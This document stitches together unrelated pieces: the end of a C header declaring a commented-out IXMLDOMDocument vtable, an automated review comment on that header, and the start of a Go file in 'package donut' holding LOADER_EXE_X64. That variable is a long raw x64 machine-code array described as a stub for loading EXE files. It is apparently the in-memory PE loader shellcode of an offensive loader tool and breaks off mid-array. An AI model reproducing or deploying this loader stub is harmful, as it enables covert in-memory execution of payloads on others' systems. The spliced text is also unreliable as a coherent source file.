441 IXMLDOMDocument * This,
442 IXMLDOMImplementation **impl);
443
444 HRESULT ( STDMETHODCALLTYPE *get_documentElement )(
445 IXMLDOMDocument * This,
446 IXMLDOMElement **DOMElement);
447
448 HRESULT ( STDMETHODCALLTYPE *putref_documentElement )(
449 IXMLDOMDocument * This,
450 IXMLDOMElement *DOMElement);
451
452 HRESULT ( STDMETHODCALLTYPE *createElement )(
453 IXMLDOMDocument * This,
454 BSTR tagName,
455 IXMLDOMElement **element);
456
457 HRESULT ( STDMETHODCALLTYPE *createDocumentFragment )(
458 IXMLDOMDocument * This,
459 IXMLDOMDocumentFragment **docFrag);
460
461 HRESULT ( STDMETHODCALLTYPE *createTextNode )(
462 IXMLDOMDocument * This,
463 BSTR data,
464 IXMLDOMText **text);
465
466 HRESULT ( STDMETHODCALLTYPE *createComment )(
467 IXMLDOMDocument * This,
468 BSTR data,
469 IXMLDOMComment **comment);
470
471 HRESULT ( STDMETHODCALLTYPE *createCDATASection )(
472 IXMLDOMDocument * This,
473 BSTR data,
474 IXMLDOMCDATASection **cdata);
475
476 HRESULT ( STDMETHODCALLTYPE *createProcessingInstruction )(
477 IXMLDOMDocument * This,
478 BSTR target,
479 BSTR data,
480 IXMLDOMProcessingInstruction **pi);
481
482 HRESULT ( STDMETHODCALLTYPE *createAttribute )(
483 IXMLDOMDocument * This,
484 BSTR name,
485 IXMLDOMAttribute **attribute);
486
487 HRESULT ( STDMETHODCALLTYPE *createEntityReference )(
488 IXMLDOMDocument * This,
489 BSTR name,
490 IXMLDOMEntityReference **entityRef);
491
492 HRESULT ( STDMETHODCALLTYPE *getElementsByTagName )(
493 IXMLDOMDocument * This,
494 BSTR tagName,
495 IXMLDOMNodeList **resultList);
496
497 HRESULT ( STDMETHODCALLTYPE *createNode )(
498 IXMLDOMDocument * This,
499 VARIANT Type,
500 BSTR name,
501 BSTR namespaceURI,
502 IXMLDOMNode **node);
503
504 HRESULT ( STDMETHODCALLTYPE *nodeFromID )(
505 IXMLDOMDocument * This,
506 BSTR idString,
507 IXMLDOMNode **node);
508
509 HRESULT ( STDMETHODCALLTYPE *load )(
510 IXMLDOMDocument * This,
511 VARIANT xmlSource,
512 VARIANT_BOOL *isSuccessful);
513
514 HRESULT ( STDMETHODCALLTYPE *get_readyState )(
515 IXMLDOMDocument * This,
516 long *value);
517
518 HRESULT ( STDMETHODCALLTYPE *get_parseError )(
519 IXMLDOMDocument * This,
520 IXMLDOMParseError **errorObj);
521
522 HRESULT ( STDMETHODCALLTYPE *get_url )(
523 IXMLDOMDocument * This,
524 BSTR *urlString);
525
526 HRESULT ( STDMETHODCALLTYPE *get_async )(
527 IXMLDOMDocument * This,
528 VARIANT_BOOL *isAsync);
529
530 HRESULT ( STDMETHODCALLTYPE *put_async )(
531 IXMLDOMDocument * This,
532 VARIANT_BOOL isAsync);
533
534 HRESULT ( STDMETHODCALLTYPE *abort )(
535 IXMLDOMDocument * This);
536
537 HRESULT ( STDMETHODCALLTYPE *loadXML )(
538 IXMLDOMDocument * This,
539 BSTR bstrXML,
540 VARIANT_BOOL *isSuccessful);
541
542 HRESULT ( STDMETHODCALLTYPE *save )(
543 IXMLDOMDocument * This,
544 VARIANT destination);
545
546 HRESULT ( STDMETHODCALLTYPE *get_validateOnParse )(
547 IXMLDOMDocument * This,
548 VARIANT_BOOL *isValidating);
549
550 HRESULT ( STDMETHODCALLTYPE *put_validateOnParse )(
551 IXMLDOMDocument * This,
552 VARIANT_BOOL isValidating);
553
554 HRESULT ( STDMETHODCALLTYPE *get_resolveExternals )(
555 IXMLDOMDocument * This,
556 VARIANT_BOOL *isResolving);
557
558 HRESULT ( STDMETHODCALLTYPE *put_resolveExternals )(
559 IXMLDOMDocument * This,
560 VARIANT_BOOL isResolving);
561
562 HRESULT ( STDMETHODCALLTYPE *get_preserveWhiteSpace )(
563 IXMLDOMDocument * This,
564 VARIANT_BOOL *isPreserving);
565
566 HRESULT ( STDMETHODCALLTYPE *put_preserveWhiteSpace )(
567 IXMLDOMDocument * This,
568 VARIANT_BOOL isPreserving);
569
570 HRESULT ( STDMETHODCALLTYPE *put_onreadystatechange )(
571 IXMLDOMDocument * This,
572 VARIANT readystatechangeSink);
573
574 HRESULT ( STDMETHODCALLTYPE *put_ondataavailable )(
575 IXMLDOMDocument * This,
576 VARIANT ondataavailableSink);
577
578 HRESULT ( STDMETHODCALLTYPE *put_ontransformnode )(
579 IXMLDOMDocument * This,
580 VARIANT ontransformnodeSink);
581
582 END_INTERFACE
583 } IXMLDOMDocumentVtbl;
584
585 typedef struct _IXMLDOMDocument {
586 IXMLDOMDocumentVtbl *lpVtbl;
587 } XMLDomDocument;*/
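Review bot: Everything after the license in this file sits inside one `/** … */` comment, so neither vtable typedef is ever compiled. If the declarations are kept as a reference copy, wrapping them in `#if 0 … #endif` under a one-line comment such as `// reference copy of the DOM vtable layouts; not compiled` states the intent and cannot be ended early by a stray `*/`; otherwise the file can be dropped. If the block is ever enabled, it would also need an include guard, and the wrapper names `XMLDOMNode` and `XMLDomDocument` are cased inconsistently and differ from the `IXMLDOMNode` / `IXMLDOMDocument` names the vtables reference.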
0 package donut
1
2 // LOADER_EXE_X64 - stub for EXE PE files
3 var LOADER_EXE_X64 = []byte{
4
5 0x55, 0x48, 0x81, 0xec, 0x30, 0x05, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24,
6 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0xc0, 0x04, 0x00, 0x00, 0x48,
7 0xc7, 0x85, 0xa8, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
8 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00,
9 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x51, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
10 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x89, 0x85, 0xa0,
11 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b,
12 0x50, 0x28, 0x48, 0x8b, 0x85, 0xa0, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd0,
13 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x04, 0x00, 0x00, 0xe8, 0x21,
14 0x15, 0x00, 0x00, 0x48, 0x89, 0x85, 0x98, 0x04, 0x00, 0x00, 0x48, 0x83,
15 0xbd, 0x98, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x89, 0x00, 0x00, 0x00,
16 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
17 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x04, 0x00, 0x00,
18 0x4c, 0x8b, 0x8d, 0xc0, 0x04, 0x00, 0x00, 0x4c, 0x8d, 0x05, 0xfc, 0x00,
19 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00,
20 0xff, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85,
21 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
22 0x89, 0x85, 0xa0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00,
23 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48, 0x8b, 0x85, 0xa0, 0x04, 0x00, 0x00,
24 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x04, 0x00,
25 0x00, 0xe8, 0x9a, 0x14, 0x00, 0x00, 0x48, 0x89, 0x85, 0x90, 0x04, 0x00,
26 0x00, 0x48, 0x83, 0xbd, 0x88, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x8b,
27 0x00, 0x00, 0x00, 0xeb, 0x0c, 0x48, 0xc7, 0xc0, 0xff, 0xff, 0xff, 0xff,
28 0xe9, 0x84, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x80, 0x04, 0x00, 0x00,
29 0x00, 0x74, 0x73, 0x48, 0x83, 0xbd, 0x90, 0x04, 0x00, 0x00, 0x00, 0x74,
30 0x69, 0xc7, 0x45, 0xe0, 0x0b, 0x00, 0x10, 0x00, 0x48, 0x8b, 0x85, 0x90,
31 0x04, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc1, 0x48, 0x8d, 0x45, 0xb0,
32 0x4c, 0x8b, 0x85, 0x80, 0x04, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x41, 0xff,
33 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x08,
34 0x02, 0x00, 0x00, 0x48, 0x89, 0x85, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x8b,
35 0x45, 0x48, 0x48, 0x83, 0xe0, 0xf0, 0x48, 0x89, 0x45, 0x48, 0x48, 0x8d,
36 0x45, 0xb0, 0x4c, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00, 0xba, 0x00, 0x00,
37 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0xeb, 0x0c, 0x48, 0x8b,
38 0x8d, 0xc0, 0x04, 0x00, 0x00, 0xe8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x8b,
39 0x85, 0xa8, 0x04, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x30, 0x05, 0x00, 0x00,
40 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8d,
41 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0xa0, 0x01, 0x00,
42 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48,
43 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
44 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48, 0x8b, 0x85, 0x68, 0x01, 0x00,
45 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01,
46 0x00, 0x00, 0xe8, 0x9d, 0x13, 0x00, 0x00, 0x48, 0x89, 0x85, 0x60, 0x01,
47 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40,
48 0x50, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0,
49 0x01, 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48, 0x8b, 0x85, 0x68, 0x01,
50 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0,
51 0x01, 0x00, 0x00, 0xe8, 0x60, 0x13, 0x00, 0x00, 0x48, 0x89, 0x85, 0x58,
52 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b,
53 0x80, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00,
54 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48,
55 0x8b, 0x85, 0x68, 0x01, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2,
56 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0x20, 0x13, 0x00, 0x00,
57 0x48, 0x89, 0x85, 0x50, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x60, 0x01,
58 0x00, 0x00, 0x00, 0x74, 0x14, 0x48, 0x83, 0xbd, 0x58, 0x01, 0x00, 0x00,
59 0x00, 0x74, 0x0a, 0x48, 0x83, 0xbd, 0x50, 0x01, 0x00, 0x00, 0x00, 0x75,
60 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xa1, 0x08, 0x00, 0x00, 0x48,
61 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b,
62 0x85, 0x60, 0x01, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41,
63 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
64 0x48, 0x89, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x01,
65 0x00, 0x00, 0x00, 0x75, 0x2a, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
66 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x0e, 0x48,
67 0x8b, 0x85, 0x50, 0x01, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff,
68 0xd0, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x41, 0x08, 0x00, 0x00, 0x48,
69 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x48,
70 0x01, 0x00, 0x00, 0x41, 0x89, 0xd0, 0x48, 0x8b, 0x95, 0xa0, 0x01, 0x00,
71 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xb3, 0x61, 0x00, 0x00, 0x48, 0x8b, 0x85,
72 0x48, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
73 0x8d, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
74 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x47, 0x61, 0x00,
75 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x04, 0x02,
76 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x92, 0x00, 0x00, 0x00, 0x48,
77 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x10, 0x02, 0x00, 0x00,
78 0x48, 0x89, 0x85, 0x40, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
79 0x00, 0x00, 0x8b, 0x00, 0x44, 0x8d, 0x80, 0xf0, 0xfd, 0xff, 0xff, 0x48,
80 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x14, 0x48, 0x8b,
81 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x8d,
82 0x40, 0x01, 0x00, 0x00, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89,
83 0xc1, 0xe8, 0x2e, 0x6e, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
84 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x95, 0xa0, 0x01, 0x00, 0x00,
85 0x48, 0x8d, 0x8a, 0x00, 0x0c, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xee,
86 0x6a, 0x00, 0x00, 0x48, 0x89, 0x85, 0x38, 0x01, 0x00, 0x00, 0x48, 0x8b,
87 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x00, 0x0d, 0x00, 0x00,
88 0x48, 0x39, 0x85, 0x38, 0x01, 0x00, 0x00, 0x0f, 0x85, 0xe6, 0x05, 0x00,
89 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28,
90 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x49,
91 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00,
92 0xe8, 0x77, 0x11, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x01, 0x00, 0x00,
93 0x48, 0x89, 0x42, 0x30, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
94 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff,
95 0xff, 0xe9, 0x02, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
96 0x00, 0x48, 0x05, 0x14, 0x02, 0x00, 0x00, 0x48, 0x89, 0x85, 0x78, 0x01,
97 0x00, 0x00, 0xc7, 0x85, 0x8c, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
98 0xeb, 0x24, 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78,
99 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85, 0x8c,
100 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xd0, 0x83, 0x85, 0x8c, 0x01, 0x00,
101 0x00, 0x01, 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78,
102 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
103 0x23, 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x01,
104 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x3b, 0x74, 0x0c,
105 0x81, 0xbd, 0x8c, 0x01, 0x00, 0x00, 0x03, 0x01, 0x00, 0x00, 0x76, 0xa2,
106 0x83, 0xbd, 0x8c, 0x01, 0x00, 0x00, 0x00, 0x74, 0x35, 0x8b, 0x85, 0x8c,
107 0x01, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x78,
108 0x01, 0x00, 0x00, 0x8b, 0x85, 0x8c, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05,
109 0xd0, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
110 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xa5, 0x0a, 0x00, 0x00, 0xe9, 0x58, 0xff,
111 0xff, 0xff, 0x90, 0xc7, 0x85, 0x8c, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00,
112 0x00, 0xe9, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
113 0x00, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
114 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b,
115 0x04, 0xd0, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0,
116 0x01, 0x00, 0x00, 0xe8, 0x54, 0x10, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0,
117 0x01, 0x00, 0x00, 0x8b, 0x8d, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc1,
118 0x06, 0x48, 0x89, 0x04, 0xca, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
119 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b,
120 0x04, 0xd0, 0x48, 0x85, 0xc0, 0x75, 0x38, 0x48, 0x8b, 0x85, 0xa0, 0x01,
121 0x00, 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85,
122 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b,
123 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x04,
124 0xd0, 0x48, 0x39, 0x85, 0x68, 0x01, 0x00, 0x00, 0x0f, 0x85, 0x38, 0x04,
125 0x00, 0x00, 0x90, 0x83, 0x85, 0x8c, 0x01, 0x00, 0x00, 0x01, 0x48, 0x8b,
126 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x10, 0x02, 0x00, 0x00, 0x39,
127 0x85, 0x8c, 0x01, 0x00, 0x00, 0x0f, 0x82, 0x47, 0xff, 0xff, 0xff, 0x48,
128 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00,
129 0x83, 0xf8, 0x02, 0x75, 0x2b, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00,
130 0xe8, 0x52, 0x10, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xf4, 0x03, 0x00,
131 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x30,
132 0x0d, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x01, 0x00, 0x00, 0xeb, 0x3c,
133 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00,
134 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x84, 0xca, 0x03, 0x00, 0x00, 0x48, 0x8b,
135 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83,
136 0xf8, 0x01, 0x75, 0x14, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
137 0x05, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x01, 0x00, 0x00,
138 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00,
139 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xba, 0xa4, 0x0f, 0x00, 0x00,
140 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x70, 0x01,
141 0x00, 0x00, 0x48, 0x8b, 0x95, 0x70, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
142 0xa0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x90, 0xf8, 0x01, 0x00, 0x00, 0x48,
143 0x83, 0xbd, 0x70, 0x01, 0x00, 0x00, 0x00, 0x75, 0x2a, 0x48, 0x8b, 0x85,
144 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8,
145 0x02, 0x75, 0x0e, 0x48, 0x8b, 0x85, 0x50, 0x01, 0x00, 0x00, 0xb9, 0x00,
146 0x00, 0x00, 0x00, 0xff, 0xd0, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x95,
147 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80,
148 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x0f, 0x84, 0x93, 0x00, 0x00,
149 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xc4, 0x56, 0x00,
150 0x00, 0x89, 0x85, 0x34, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x34, 0x01, 0x00,
151 0x00, 0x00, 0x75, 0x16, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b,
152 0x80, 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0xf1, 0x02,
153 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xdd, 0x58,
154 0x00, 0x00, 0x89, 0x85, 0x34, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x34, 0x01,
155 0x00, 0x00, 0x00, 0x75, 0x16, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
156 0x8b, 0x80, 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0xc3,
157 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xbb,
158 0x58, 0x00, 0x00, 0x89, 0x85, 0x34, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x34,
159 0x01, 0x00, 0x00, 0x00, 0x75, 0x16, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
160 0x00, 0x8b, 0x80, 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84,
161 0x95, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b,
162 0x40, 0x08, 0x83, 0xf8, 0x01, 0x0f, 0x84, 0x8d, 0x01, 0x00, 0x00, 0x48,
163 0xc7, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
164 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x89,
165 0xc0, 0x48, 0x05, 0x2f, 0x15, 0x00, 0x00, 0x48, 0x25, 0x00, 0xf0, 0xff,
166 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8d, 0x4d, 0xc8, 0x48, 0x8d, 0x85,
167 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x70, 0x01, 0x00, 0x00, 0x48,
168 0x89, 0x54, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x04, 0x00, 0x00, 0x00,
169 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41,
170 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff,
171 0xff, 0xff, 0xff, 0xe8, 0x1b, 0x65, 0x00, 0x00, 0x89, 0x85, 0x30, 0x01,
172 0x00, 0x00, 0x83, 0xbd, 0x30, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x09,
173 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b,
174 0x95, 0x80, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x30, 0x05, 0x00, 0x00, 0x48,
175 0x89, 0xc1, 0xe8, 0xd5, 0x5c, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
176 0x00, 0x00, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x03, 0x74, 0x13, 0x48, 0x8b,
177 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x04, 0x0f,
178 0x85, 0x93, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
179 0x4c, 0x8b, 0x90, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
180 0x00, 0x00, 0x8b, 0x88, 0x20, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80,
181 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x88, 0x28, 0x05, 0x00, 0x00, 0x48, 0x8b,
182 0x85, 0x80, 0x01, 0x00, 0x00, 0x44, 0x8b, 0x98, 0x24, 0x05, 0x00, 0x00,
183 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x28, 0x05,
184 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x08,
185 0x83, 0xe8, 0x01, 0x80, 0xcc, 0x01, 0x0f, 0xb7, 0xc0, 0x4c, 0x8d, 0x85,
186 0x24, 0x01, 0x00, 0x00, 0x4c, 0x89, 0x44, 0x24, 0x28, 0x89, 0x4c, 0x24,
187 0x20, 0x45, 0x89, 0xd8, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x2c,
188 0x01, 0x00, 0x00, 0x83, 0xbd, 0x2c, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85,
189 0x4b, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48,
190 0x89, 0x85, 0x80, 0x01, 0x00, 0x00, 0xeb, 0x40, 0x48, 0x8b, 0x85, 0x80,
191 0x01, 0x00, 0x00, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x02, 0x75, 0x31, 0x48,
192 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x28, 0x05, 0x00,
193 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x05, 0x28, 0x05,
194 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xe0, 0x58, 0x00, 0x00, 0x48, 0x8b,
